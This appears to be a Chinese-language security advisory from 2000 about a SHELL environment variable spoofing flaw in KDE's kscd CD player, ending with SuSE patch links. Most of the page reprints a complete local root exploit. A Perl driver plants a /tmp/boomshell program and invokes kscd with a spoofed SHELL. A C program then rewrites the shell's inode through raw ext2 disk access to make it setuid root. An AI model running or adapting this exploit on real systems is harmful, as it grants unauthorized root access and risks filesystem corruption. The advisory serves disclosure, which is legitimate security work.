安全研究
安全漏洞
kscd SHELL 环境变量欺骗漏洞
发布日期:2000-05-17
更新日期:2000-05-31
受影响系统:
KDE KDE 2.0 BETA不受影响系统:
KDE KDE 1.2
KDE KDE 1.1.1
KDE KDE 1.1
+ SuSE 6.1-6.4
RedHat 6.1描述:
kscd是一个KDE桌面下的CD播放器软件,是KDE多媒体软件包中的一部分。在某些Linux系统下
这个应用程序缺省被设置了suid 'disk'位. kscd利用'SHELL'变量来执行shell,攻击者可以
修改SHELL变量的内容,让kscd去执行任意命令,攻击者可能可以获得disk用户的权限。利用
disk权限,攻击者也可能直接进行磁盘读写,从而获得超级用户的权限。
<* 来源:Sebastian <krahmer@cs.uni-potsdam.de> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets:
# TESO
# security.is
# lam3rz
# 29A
# Mike and Silvio.
#
# Special thanx to
#
# C.P. -- roots, bloody roots }|-]
# Michal Zalewski -- No sex causes what? I can't deciffer the pic ... :PP
#
# Description:
#
# kscd local root exploit. kscd belongs to the KDE multimedia-pack. (stupid)
# As so often with GUI's, kscd is setgid-disk and get's the shell for
# a browser-execution via SHELL-environment variable. So, we set it
# to /tmp/boomshell which will make ext2fs setgid-disk. Then we use
# ext2fs to change /tmp/boomshell to a setuid-root-file via raw-filesystem
# access (we are group disk!). Please make sure you have
#
# a) ext2fs-lib installed (default)
# b) kscd setgid disk (default on SuSE 6.4 f.e.)
# c) a CD in drive (hmmm ...)
# d) /tmp points to a disk where setuid's are allowes (default)
# e) brain and responsibility (unfortunally not default)
#
# Note that the change via ext2fs takes affect after next re-mount (e.g. 'reboot')
# We assume that group disk has GID 6. Change if necessary.
#
#
# Warning: You are playing with your filesystem! This can cause data-loss.
# Use a zip-disk for playing! YOU USE IT AT YOUR OWN RISK!
# For educational purposes only!
#
# This exploit goes under the GPL!
#
sub usage
{
print "Usage: $0 <device_where_tmp_is (/dev/hdaX)>\n";
exit 0;
}
$disk = shift or usage();
$kde = $ENV{'HOME'}."/.kde/share/config/kscdrc";
unlink $kde;
`cc ext2fs.c -lext2fs -o /tmp/ext2fs`;
# create kscd config-file -- necessary
open O, ">$kde" or die "Can't open config-file of kscd!\n";
print O<<_EOF_;
# KDE Config File
[SMTP]
enabled=true
serverHost=localhost
serverPort=25
[CDDB]
CurrentServer=www.cddb.com cddbp 8880 -
HTTPProxyHost=
CDDBRemoteEnabled=0
SeverList=www.cddb.com cddbp 8880 -,
CDDBHTTPProxyEnabled=0
HTTPProxyPort=0
LocalBaseDir=/opt/kde/share/apps/kscd/cddb/
[MAGIC]
magicwidth=320
magicheight=200
magicbrightness=3
[General]
ToolTips=1
RandomPlay=0
DOCKING=1
AUTOPLAY=0
CDDevice=/dev/cdrom
CustomBroserCmd=
BackColor=0,0,0
AUTODOCK=0
Volume=40
EJECTONFINISH=0
USEKFM=0
STOPEXIT=1
LEDColor=226,224,255
UnixMailCommand=owned
_EOF_
close O;
# drop boomshell
open O, ">/tmp/boomshell.c" or die "Can't open /tmp/boomshell!\n";
print O<<_EOF_;
#include <stdio.h>
int main()
{
char *a[] = {
"/bin/bash",
NULL
};
setuid(0);
setgid(0);
/* in case we are invoked by kscd */
if (getuid() != 0) {
chown("/tmp/ext2fs", getuid(), 6);
chmod("/tmp/ext2fs", 02755);
return 0;
}
execve(*a, a, NULL);
return 0;
}
_EOF_
close O;
`cc /tmp/boomshell.c -o /tmp/boomshell`;
$ENV{'PATH'}="/opt/kde/bin:".$ENV{'PATH'};
$ENV{'SHELL'}="/tmp/boomshell";
print "Invoking kscd now.\n";
print "Click [i] -> [Information] -> [Ultimate Bandlist]\n";
print "Exit kscd then.\nI will do the rest.\n";
`kscd`;
print "Execute /tmp/boomshell after next reboot.\n";
# ext2fs should be setgid-disk now, which lets us make a shell suid
exec "/tmp/ext2fs", $disk, "/tmp/boomshell";
--- ext2_fs.h ---
/*
* linux/include/linux/ext2_fs.h
*
* Copyright (C) 1992, 1993, 1994, 1995
* Remy Card (card@masi.ibp.fr)
* Laboratoire MASI - Institut Blaise Pascal
* Universite Pierre et Marie Curie (Paris VI)
*
* from
*
* linux/include/linux/minix_fs.h
*
* Copyright (C) 1991, 1992 Linus Torvalds
*/
#ifndef _LINUX_EXT2_FS_H
#define _LINUX_EXT2_FS_H
#include <asm/types.h> /* Changed from linux/types.h */
/*
* The second extended filesystem constants/structures
*/
/*
* Define EXT2FS_DEBUG to produce debug messages
*/
#undef EXT2FS_DEBUG
/*
* Define EXT2_PREALLOCATE to preallocate data blocks for expanding files
*/
#define EXT2_PREALLOCATE
#define EXT2_DEFAULT_PREALLOC_BLOCKS 8
/*
* The second extended file system version
*/
#define EXT2FS_DATE "95/08/09"
#define EXT2FS_VERSION "0.5b"
/*
* Debug code
*/
#if 0
#ifdef EXT2FS_DEBUG
# define ext2_debug(f, a...) { \
printk ("EXT2-fs DEBUG (%s, %d): %s:", \
__FILE__, __LINE__, __FUNCTION__); \
printk (f, ## a); \
}
#else
# define ext2_debug(f, a...) /**/
#endif
#endif
/*
* Special inodes numbers
*/
#define EXT2_BAD_INO 1 /* Bad blocks inode */
#define EXT2_ROOT_INO 2 /* Root inode */
#define EXT2_ACL_IDX_INO 3 /* ACL inode */
#define EXT2_ACL_DATA_INO 4 /* ACL inode */
#define EXT2_BOOT_LOADER_INO 5 /* Boot loader inode */
#define EXT2_UNDEL_DIR_INO 6 /* Undelete directory inode */
/* First non-reserved inode for old ext2 filesystems */
#define EXT2_GOOD_OLD_FIRST_INO 11
/*
* The second extended file system magic number
*/
#define EXT2_SUPER_MAGIC 0xEF53
/*
* Maximal count of links to a file
*/
#define EXT2_LINK_MAX 32000
/*
* Macro-instructions used to manage several block sizes
*/
#define EXT2_MIN_BLOCK_SIZE 1024
#define EXT2_MAX_BLOCK_SIZE 4096
#define EXT2_MIN_BLOCK_LOG_SIZE 10
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE(s) ((s)->s_blocksize)
#else
# define EXT2_BLOCK_SIZE(s) (EXT2_MIN_BLOCK_SIZE << (s)->s_log_block_size)
#endif
#define EXT2_ACLE_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_acl_entry))
#define EXT2_ADDR_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / sizeof (__u32))
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE_BITS(s) ((s)->s_blocksize_bits)
#else
# define EXT2_BLOCK_SIZE_BITS(s) ((s)->s_log_block_size + 10)
#endif
#ifdef __KERNEL__
#define EXT2_ADDR_PER_BLOCK_BITS(s) ((s)->u.ext2_sb.s_addr_per_block_bits)
#define EXT2_INODE_SIZE(s) ((s)->u.ext2_sb.s_inode_size)
#define EXT2_FIRST_INO(s) ((s)->u.ext2_sb.s_first_ino)
#else
#define EXT2_INODE_SIZE(s) (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
EXT2_GOOD_OLD_INODE_SIZE : \
(s)->s_inode_size)
#define EXT2_FIRST_INO(s) (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
EXT2_GOOD_OLD_FIRST_INO : \
(s)->s_first_ino)
#endif
/*
* Macro-instructions used to manage fragments
*/
#define EXT2_MIN_FRAG_SIZE 1024
#define EXT2_MAX_FRAG_SIZE 4096
#define EXT2_MIN_FRAG_LOG_SIZE 10
#ifdef __KERNEL__
# define EXT2_FRAG_SIZE(s) ((s)->u.ext2_sb.s_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s) ((s)->u.ext2_sb.s_frags_per_block)
#else
# define EXT2_FRAG_SIZE(s) (EXT2_MIN_FRAG_SIZE << (s)->s_log_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / EXT2_FRAG_SIZE(s))
#endif
/*
* ACL structures
*/
struct ext2_acl_header /* Header of Access Control Lists */
{
__u32 aclh_size;
__u32 aclh_file_count;
__u32 aclh_acle_count;
__u32 aclh_first_acle;
};
struct ext2_acl_entry /* Access Control List Entry */
{
__u32 acle_size;
__u16 acle_perms; /* Access permissions */
__u16 acle_type; /* Type of entry */
__u16 acle_tag; /* User or group identity */
__u16 acle_pad1;
__u32 acle_next; /* Pointer on next entry for the */
/* same inode or on next free entry */
};
/*
* Structure of a blocks group descriptor
*/
struct ext2_group_desc
{
__u32 bg_block_bitmap; /* Blocks bitmap block */
__u32 bg_inode_bitmap; /* Inodes bitmap block */
__u32 bg_inode_table; /* Inodes table block */
__u16 bg_free_blocks_count; /* Free blocks count */
__u16 bg_free_inodes_count; /* Free inodes count */
__u16 bg_used_dirs_count; /* Directories count */
__u16 bg_pad;
__u32 bg_reserved[3];
};
/*
* Macro-instructions used to manage group descriptors
*/
#ifdef __KERNEL__
# define EXT2_BLOCKS_PER_GROUP(s) ((s)->u.ext2_sb.s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s) ((s)->u.ext2_sb.s_desc_per_block)
# define EXT2_INODES_PER_GROUP(s) ((s)->u.ext2_sb.s_inodes_per_group)
# define EXT2_DESC_PER_BLOCK_BITS(s) ((s)->u.ext2_sb.s_desc_per_block_bits)
#else
# define EXT2_BLOCKS_PER_GROUP(s) ((s)->s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s) (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_group_desc))
# define EXT2_INODES_PER_GROUP(s) ((s)->s_inodes_per_group)
#endif
/*
* Constants relative to the data blocks
*/
#define EXT2_NDIR_BLOCKS 12
#define EXT2_IND_BLOCK EXT2_NDIR_BLOCKS
#define EXT2_DIND_BLOCK (EXT2_IND_BLOCK + 1)
#define EXT2_TIND_BLOCK (EXT2_DIND_BLOCK + 1)
#define EXT2_N_BLOCKS (EXT2_TIND_BLOCK + 1)
/*
* Inode flags
*/
#define EXT2_SECRM_FL 0x00000001 /* Secure deletion */
#define EXT2_UNRM_FL 0x00000002 /* Undelete */
#define EXT2_COMPR_FL 0x00000004 /* Compress file */
#define EXT2_SYNC_FL 0x00000008 /* Synchronous updates */
#define EXT2_IMMUTABLE_FL 0x00000010 /* Immutable file */
#define EXT2_APPEND_FL 0x00000020 /* writes to file may only append */
#define EXT2_NODUMP_FL 0x00000040 /* do not dump file */
#define EXT2_NOATIME_FL 0x00000080 /* do not update atime */
/* Reserved for compression usage... */
#define EXT2_DIRTY_FL 0x00000100
#define EXT2_COMPRBLK_FL 0x00000200 /* One or more compressed clusters */
#define EXT2_NOCOMP_FL 0x00000400 /* Don't compress */
#define EXT2_ECOMPR_FL 0x00000800 /* Compression error */
/* End compression flags --- maybe not all used */
#define EXT2_BTREE_FL 0x00001000 /* btree format dir */
#define EXT2_RESERVED_FL 0x80000000 /* reserved for ext2 lib */
#define EXT2_FL_USER_VISIBLE 0x00001FFF /* User visible flags */
#define EXT2_FL_USER_MODIFIABLE 0x000000FF /* User modifiable flags */
/*
* ioctl commands
*/
#define EXT2_IOC_GETFLAGS _IOR('f', 1, long)
#define EXT2_IOC_SETFLAGS _IOW('f', 2, long)
#define EXT2_IOC_GETVERSION _IOR('v', 1, long)
#define EXT2_IOC_SETVERSION _IOW('v', 2, long)
/*
* Structure of an inode on the disk
*/
struct ext2_inode {
__u16 i_mode; /* File mode */
__u16 i_uid; /* Owner Uid */
__u32 i_size; /* Size in bytes */
__u32 i_atime; /* Access time */
__u32 i_ctime; /* Creation time */
__u32 i_mtime; /* Modification time */
__u32 i_dtime; /* Deletion Time */
__u16 i_gid; /* Group Id */
__u16 i_links_count; /* Links count */
__u32 i_blocks; /* Blocks count */
__u32 i_flags; /* File flags */
union {
struct {
__u32 l_i_reserved1;
} linux1;
struct {
__u32 h_i_translator;
} hurd1;
struct {
__u32 m_i_reserved1;
} masix1;
} osd1; /* OS dependent 1 */
__u32 i_block[EXT2_N_BLOCKS];/* Pointers to blocks */
__u32 i_version; /* File version (for NFS) */
__u32 i_file_acl; /* File ACL */
__u32 i_dir_acl; /* Directory ACL */
__u32 i_faddr; /* Fragment address */
union {
struct {
__u8 l_i_frag; /* Fragment number */
__u8 l_i_fsize; /* Fragment size */
__u16 i_pad1;
__u32 l_i_reserved2[2];
} linux2;
struct {
__u8 h_i_frag; /* Fragment number */
__u8 h_i_fsize; /* Fragment size */
__u16 h_i_mode_high;
__u16 h_i_uid_high;
__u16 h_i_gid_high;
__u32 h_i_author;
} hurd2;
struct {
__u8 m_i_frag; /* Fragment number */
__u8 m_i_fsize; /* Fragment size */
__u16 m_pad1;
__u32 m_i_reserved2[2];
} masix2;
} osd2; /* OS dependent 2 */
};
#define i_size_high i_dir_acl
#if defined(__KERNEL__) || defined(__linux__)
#define i_reserved1 osd1.linux1.l_i_reserved1
#define i_frag osd2.linux2.l_i_frag
#define i_fsize osd2.linux2.l_i_fsize
#define i_reserved2 osd2.linux2.l_i_reserved2
#elif defined(__GNU__)
#define i_translator osd1.hurd1.h_i_translator
#define i_frag osd2.hurd2.h_i_frag;
#define i_fsize osd2.hurd2.h_i_fsize;
#define i_uid_high osd2.hurd2.h_i_uid_high
#define i_gid_high osd2.hurd2.h_i_gid_high
#define i_author osd2.hurd2.h_i_author
#elif defined (__masix__)
#define i_reserved1 osd1.masix1.m_i_reserved1
#define i_frag osd2.masix2.m_i_frag
#define i_fsize osd2.masix2.m_i_fsize
#define i_reserved2 osd2.masix2.m_i_reserved2
#endif /* defined(__KERNEL__) || defined(__linux__) */
/*
* File system states
*/
#define EXT2_VALID_FS 0x0001 /* Unmounted cleanly */
#define EXT2_ERROR_FS 0x0002 /* Errors detected */
/*
* Mount flags
*/
#define EXT2_MOUNT_CHECK_NORMAL 0x0001 /* Do some more checks */
#define EXT2_MOUNT_CHECK_STRICT 0x0002 /* Do again more checks */
#define EXT2_MOUNT_CHECK (EXT2_MOUNT_CHECK_NORMAL | \
EXT2_MOUNT_CHECK_STRICT)
#define EXT2_MOUNT_GRPID 0x0004 /* Create files with directory's group */
#define EXT2_MOUNT_DEBUG 0x0008 /* Some debugging messages */
#define EXT2_MOUNT_ERRORS_CONT 0x0010 /* Continue on errors */
#define EXT2_MOUNT_ERRORS_RO 0x0020 /* Remount fs ro on errors */
#define EXT2_MOUNT_ERRORS_PANIC 0x0040 /* Panic on errors */
#define EXT2_MOUNT_MINIX_DF 0x0080 /* Mimics the Minix statfs */
#define clear_opt(o, opt) o &= ~EXT2_MOUNT_##opt
#define set_opt(o, opt) o |= EXT2_MOUNT_##opt
#define test_opt(sb, opt) ((sb)->u.ext2_sb.s_mount_opt & \
EXT2_MOUNT_##opt)
/*
* Maximal mount counts between two filesystem checks
*/
#define EXT2_DFL_MAX_MNT_COUNT 20 /* Allow 20 mounts */
#define EXT2_DFL_CHECKINTERVAL 0 /* Don't use interval check */
/*
* Behaviour when detecting errors
*/
#define EXT2_ERRORS_CONTINUE 1 /* Continue execution */
#define EXT2_ERRORS_RO 2 /* Remount fs read-only */
#define EXT2_ERRORS_PANIC 3 /* Panic */
#define EXT2_ERRORS_DEFAULT EXT2_ERRORS_CONTINUE
/*
* Structure of the super block
*/
struct ext2_super_block {
__u32 s_inodes_count; /* Inodes count */
__u32 s_blocks_count; /* Blocks count */
__u32 s_r_blocks_count; /* Reserved blocks count */
__u32 s_free_blocks_count; /* Free blocks count */
__u32 s_free_inodes_count; /* Free inodes count */
__u32 s_first_data_block; /* First Data Block */
__u32 s_log_block_size; /* Block size */
__s32 s_log_frag_size; /* Fragment size */
__u32 s_blocks_per_group; /* # Blocks per group */
__u32 s_frags_per_group; /* # Fragments per group */
__u32 s_inodes_per_group; /* # Inodes per group */
__u32 s_mtime; /* Mount time */
__u32 s_wtime; /* Write time */
__u16 s_mnt_count; /* Mount count */
__s16 s_max_mnt_count; /* Maximal mount count */
__u16 s_magic; /* Magic signature */
__u16 s_state; /* File system state */
__u16 s_errors; /* Behaviour when detecting errors */
__u16 s_minor_rev_level; /* minor revision level */
__u32 s_lastcheck; /* time of last check */
__u32 s_checkinterval; /* max. time between checks */
__u32 s_creator_os; /* OS */
__u32 s_rev_level; /* Revision level */
__u16 s_def_resuid; /* Default uid for reserved blocks */
__u16 s_def_resgid; /* Default gid for reserved blocks */
/*
* These fields are for EXT2_DYNAMIC_REV superblocks only.
*
* Note: the difference between the compatible feature set and
* the incompatible feature set is that if there is a bit set
* in the incompatible feature set that the kernel doesn't
* know about, it should refuse to mount the filesystem.
*
* e2fsck's requirements are more strict; if it doesn't know
* about a feature in either the compatible or incompatible
* feature set, it must abort and not try to meddle with
* things it doesn't understand...
*/
__u32 s_first_ino; /* First non-reserved inode */
__u16 s_inode_size; /* size of inode structure */
__u16 s_block_group_nr; /* block group # of this superblock */
__u32 s_feature_compat; /* compatible feature set */
__u32 s_feature_incompat; /* incompatible feature set */
__u32 s_feature_ro_compat; /* readonly-compatible feature set */
__u8 s_uuid[16]; /* 128-bit uuid for volume */
char s_volume_name[16]; /* volume name */
char s_last_mounted[64]; /* directory where last mounted */
__u32 s_algorithm_usage_bitmap; /* For compression */
/*
* Performance hints. Directory preallocation should only
* happen if the EXT2_COMPAT_PREALLOC flag is on.
*/
__u8 s_prealloc_blocks; /* Nr of blocks to try to preallocate*/
__u8 s_prealloc_dir_blocks; /* Nr to preallocate for dirs */
__u16 s_padding1;
__u32 s_reserved[204]; /* Padding to the end of the block */
};
#ifdef __KERNEL__
#define EXT2_SB(sb) (&((sb)->u.ext2_sb))
#else
/* Assume that user mode programs are passing in an ext2fs superblock, not
* a kernel struct super_block. This will allow us to call the feature-test
* macros from user land. */
#define EXT2_SB(sb) (sb)
#endif
/*
* Codes for operating systems
*/
#define EXT2_OS_LINUX 0
#define EXT2_OS_HURD 1
#define EXT2_OS_MASIX 2
#define EXT2_OS_FREEBSD 3
#define EXT2_OS_LITES 4
/*
* Revision levels
*/
#define EXT2_GOOD_OLD_REV 0 /* The good old (original) format */
#define EXT2_DYNAMIC_REV 1 /* V2 format w/ dynamic inode sizes */
#define EXT2_CURRENT_REV EXT2_GOOD_OLD_REV
#define EXT2_MAX_SUPP_REV EXT2_DYNAMIC_REV
#define EXT2_GOOD_OLD_INODE_SIZE 128
/*
* Feature set definitions
*/
#define EXT2_HAS_COMPAT_FEATURE(sb,mask) \
( EXT2_SB(sb)->s_feature_compat & (mask) )
#define EXT2_HAS_RO_COMPAT_FEATURE(sb,mask) \
( EXT2_SB(sb)->s_feature_ro_compat & (mask) )
#define EXT2_HAS_INCOMPAT_FEATURE(sb,mask) \
( EXT2_SB(sb)->s_feature_incompat & (mask) )
#define EXT2_FEATURE_COMPAT_DIR_PREALLOC 0x0001
#define EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER 0x0001
#define EXT2_FEATURE_RO_COMPAT_LARGE_FILE 0x0002
#define EXT2_FEATURE_RO_COMPAT_BTREE_DIR 0x0004
#define EXT2_FEATURE_INCOMPAT_COMPRESSION 0x0001
#define EXT2_FEATURE_INCOMPAT_FILETYPE 0x0002
#define EXT2_FEATURE_COMPAT_SUPP 0
#define EXT2_FEATURE_INCOMPAT_SUPP EXT2_FEATURE_INCOMPAT_FILETYPE
#define EXT2_FEATURE_RO_COMPAT_SUPP (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER| \
EXT2_FEATURE_RO_COMPAT_LARGE_FILE| \
EXT2_FEATURE_RO_COMPAT_BTREE_DIR)
/*
* Default values for user and/or group using reserved blocks
*/
#define EXT2_DEF_RESUID 0
#define EXT2_DEF_RESGID 0
/*
* Structure of a directory entry
*/
#define EXT2_NAME_LEN 255
struct ext2_dir_entry {
__u32 inode; /* Inode number */
__u16 rec_len; /* Directory entry length */
__u16 name_len; /* Name length */
char name[EXT2_NAME_LEN]; /* File name */
};
/*
* The new version of the directory entry. Since EXT2 structures are
* stored in intel byte order, and the name_len field could never be
* bigger than 255 chars, it's safe to reclaim the extra byte for the
* file_type field.
*/
struct ext2_dir_entry_2 {
__u32 inode; /* Inode number */
__u16 rec_len; /* Directory entry length */
__u8 name_len; /* Name length */
__u8 file_type;
char name[EXT2_NAME_LEN]; /* File name */
};
/*
* Ext2 directory file types. Only the low 3 bits are used. The
* other bits are reserved for now.
*/
#define EXT2_FT_UNKNOWN 0
#define EXT2_FT_REG_FILE 1
#define EXT2_FT_DIR 2
#define EXT2_FT_CHRDEV 3
#define EXT2_FT_BLKDEV 4
#define EXT2_FT_FIFO 5
#define EXT2_FT_SOCK 6
#define EXT2_FT_SYMLINK 7
#define EXT2_FT_MAX 8
/*
* EXT2_DIR_PAD defines the directory entries boundaries
*
* NOTE: It must be a multiple of 4
*/
#define EXT2_DIR_PAD 4
#define EXT2_DIR_ROUND (EXT2_DIR_PAD - 1)
#define EXT2_DIR_REC_LEN(name_len) (((name_len) + 8 + EXT2_DIR_ROUND) & \
~EXT2_DIR_ROUND)
#ifdef __KERNEL__
/*
* Function prototypes
*/
/*
* Ok, these declarations are also in <linux/kernel.h> but none of the
* ext2 source programs needs to include it so they are duplicated here.
*/
# define NORET_TYPE /**/
# define ATTRIB_NORET __attribute__((noreturn))
# define NORET_AND noreturn,
/* acl.c */
extern int ext2_permission (struct inode *, int);
/* balloc.c */
extern int ext2_new_block (const struct inode *, unsigned long,
__u32 *, __u32 *, int *);
extern void ext2_free_blocks (const struct inode *, unsigned long,
unsigned long);
extern unsigned long ext2_count_free_blocks (struct super_block *);
extern void ext2_check_blocks_bitmap (struct super_block *);
/* bitmap.c */
extern unsigned long ext2_count_free (struct buffer_head *, unsigned);
/* dir.c */
extern int ext2_check_dir_entry (const char *, struct inode *,
struct ext2_dir_entry_2 *, struct buffer_head *,
unsigned long);
/* file.c */
extern int ext2_read (struct inode *, struct file *, char *, int);
extern int ext2_write (struct inode *, struct file *, char *, int);
/* fsync.c */
extern int ext2_sync_file (struct file *, struct dentry *);
/* ialloc.c */
extern struct inode * ext2_new_inode (const struct inode *, int, int *);
extern void ext2_free_inode (struct inode *);
extern unsigned long ext2_count_free_inodes (struct super_block *);
extern void ext2_check_inodes_bitmap (struct super_block *);
/* inode.c */
extern int ext2_bmap (struct inode *, int);
extern struct buffer_head * ext2_getblk (struct inode *, long, int, int *);
extern struct buffer_head * ext2_bread (struct inode *, int, int, int *);
extern int ext2_getcluster (struct inode * inode, long block);
extern void ext2_read_inode (struct inode *);
extern void ext2_write_inode (struct inode *);
extern void ext2_put_inode (struct inode *);
extern void ext2_delete_inode (struct inode *);
extern int ext2_sync_inode (struct inode *);
extern void ext2_discard_prealloc (struct inode *);
/* ioctl.c */
extern int ext2_ioctl (struct inode *, struct file *, unsigned int,
unsigned long);
/* namei.c */
extern void ext2_release (struct inode *, struct file *);
extern int ext2_lookup (struct inode *, struct dentry *);
extern int ext2_create (struct inode *,struct dentry *,int);
extern int ext2_mkdir (struct inode *,struct dentry *,int);
extern int ext2_rmdir (struct inode *,struct dentry *);
extern int ext2_unlink (struct inode *,struct dentry *);
extern int ext2_symlink (struct inode *,struct dentry *,const char *);
extern int ext2_link (struct dentry *, struct inode *, struct dentry *);
extern int ext2_mknod (struct inode *, struct dentry *, int, int);
extern int ext2_rename (struct inode *, struct dentry *,
struct inode *, struct dentry *);
/* super.c */
extern void ext2_error (struct super_block *, const char *, const char *, ...)
__attribute__ ((format (printf, 3, 4)));
extern NORET_TYPE void ext2_panic (struct super_block *, const char *,
const char *, ...)
__attribute__ ((NORET_AND format (printf, 3, 4)));
extern void ext2_warning (struct super_block *, const char *, const char *, ...)
__attribute__ ((format (printf, 3, 4)));
extern void ext2_put_super (struct super_block *);
extern void ext2_write_super (struct super_block *);
extern int ext2_remount (struct super_block *, int *, char *);
extern struct super_block * ext2_read_super (struct super_block *,void *,int);
extern int init_ext2_fs(void);
extern int ext2_statfs (struct super_block *, struct statfs *, int);
/* truncate.c */
extern void ext2_truncate (struct inode *);
/*
* Inodes and files operations
*/
/* dir.c */
extern struct inode_operations ext2_dir_inode_operations;
/* file.c */
extern struct inode_operations ext2_file_inode_operations;
/* symlink.c */
extern struct inode_operations ext2_symlink_inode_operations;
#endif /* __KERNEL__ */
#endif /* _LINUX_EXT2_FS_H */
--- ext2fs.c ---
/* This file belongs to the kscd-hack. Do not use it at all,
* it is called by the perl-script.
* FOR EDUCATIONAL PURPOSES ONLY!
* YOU USE IT AT YOUR OWN RISK!
*/
#include <stdio.h>
#include "ext2_fs.h"
#include <ext2fs/ext2fs.h>
#include <ext2fs/ext2_io.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>
int usage(char *s)
{
fprintf(stderr, "Man, use it like this: %s <filesystem> <file>\n", s);
exit(1);
}
int main(int argc, char **argv)
{
ext2_filsys fsd;
struct stat st;
struct ext2_inode stealth_inode;
int i;
if (argc < 3)
usage(argv[0]);
/* Fetch inode# */
if (stat(argv[2], &st) < 0) {
perror("stat");
exit(errno);
}
for (i = 0; i < 10; i++)
sync();
if (ext2fs_open(argv[1], EXT2_FLAG_RW /* open RW */, 0 /* use def. superblock */, 0 /* def.size */,
unix_io_manager /* default manager */, &fsd) != 0) {
fprintf(stderr, "Error opeening %s-FS\n", argv[1]);
exit(errno);
}
printf("Your fuxoring inode-number is %d\n", st.st_ino);
if (ext2fs_read_inode(fsd, st.st_ino, &stealth_inode) != 0) {
fprintf(stderr, "Error reading inode.\n");
exit(1);
}
stealth_inode.i_mode = 06755|S_IFREG;
stealth_inode.i_uid = 0;
stealth_inode.i_gid = 0;
if (ext2fs_write_inode(fsd, st.st_ino, &stealth_inode) != 0) {
fprintf(stderr, "Error writing inode.\n");
exit(1);
}
if (ext2fs_close(fsd) != 0) {
fprintf(stderr, "Error closing filesystem.\n");
exit(1);
}
printf("The requested file will have mode 06755 after next remount. Make sure nobody\n"
"open()/close() it until remount, coz kernel still has the old mode 0755 cached\n"
"and will write this to disk if you do so!\n\n");
return 0;
}
建议:
SuSE 提供了相应的升级软件包,可以在下列地址下载:
AXP:
817852e77080ecb444cb3ab9d0e6f52d ftp://ftp.suse.com/pub/suse/axp/update/6.1/kde1/kmulti-1.1.2-141.alpha.rpm
bf3ea6a10793225d5468efa72efb13cb ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
8e1cc62cf437c43eca044562637d9ea3 ftp://ftp.suse.com/pub/suse/axp/update/6.3/kde1/kmulti-1.1.2-141.alpha.rpm
61dc0c2588a707ec9ba1c6be00aac58c ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
45e951b3b14435a1c1ab89d3e4e5df1d ftp://ftp.suse.com/pub/suse/axp/update/6.4/kde1/kmulti-1.1.2-141.alpha.rpm
a70b356603227e1a0e49d0eeab934ad8 ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/kmulti-1.1.2-141.src.rpm
i386:
d4c6bc55edbb9aa4da76b2d9b186e6a9 ftp://ftp.suse.com/pub/suse/i386/update/6.1/kde1/kmulti-1.1.2-141.i386.rpm
9ac324e3a9bb1794280d8175f5762d5d ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
f8318113abdde6e2a9118db63d50a550 ftp://ftp.suse.com/pub/suse/i386/update/6.2/kde1/kmulti-1.1.2-141.i386.rpm
18d5fc80412db2dc70770d9b175180d9 ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/kmulti-1.1.2-141.src.rpm
43f1febe8dc5502132246b8ad977db54 ftp://ftp.suse.com/pub/suse/i386/update/6.3/kde1/kmulti-1.1.2-141.i386.rpm
bce686afd6186c9cb9816ccf95744040 ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
4a14b88f9b6f80c8ffcf4b82750d7bfb ftp://ftp.suse.com/pub/suse/i386/update/6.4/kde1/kmulti-1.1.2-140.i386.rpm
de787463851f38b69e576cf8de7d9309 ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/kmulti-1.1.2-140.src.rpm
PPC:
3de7429a24620ca2b7e61f799478e2b8 ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kde1/kmulti-1.1.2-141.ppc.rpm
444e9ffc4fbc643deb208c45bcb31725 ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/kmulti-1.1.2-141.src.rpm
浏览次数:7039
严重程度:0(网友投票)
绿盟科技给您安全的保障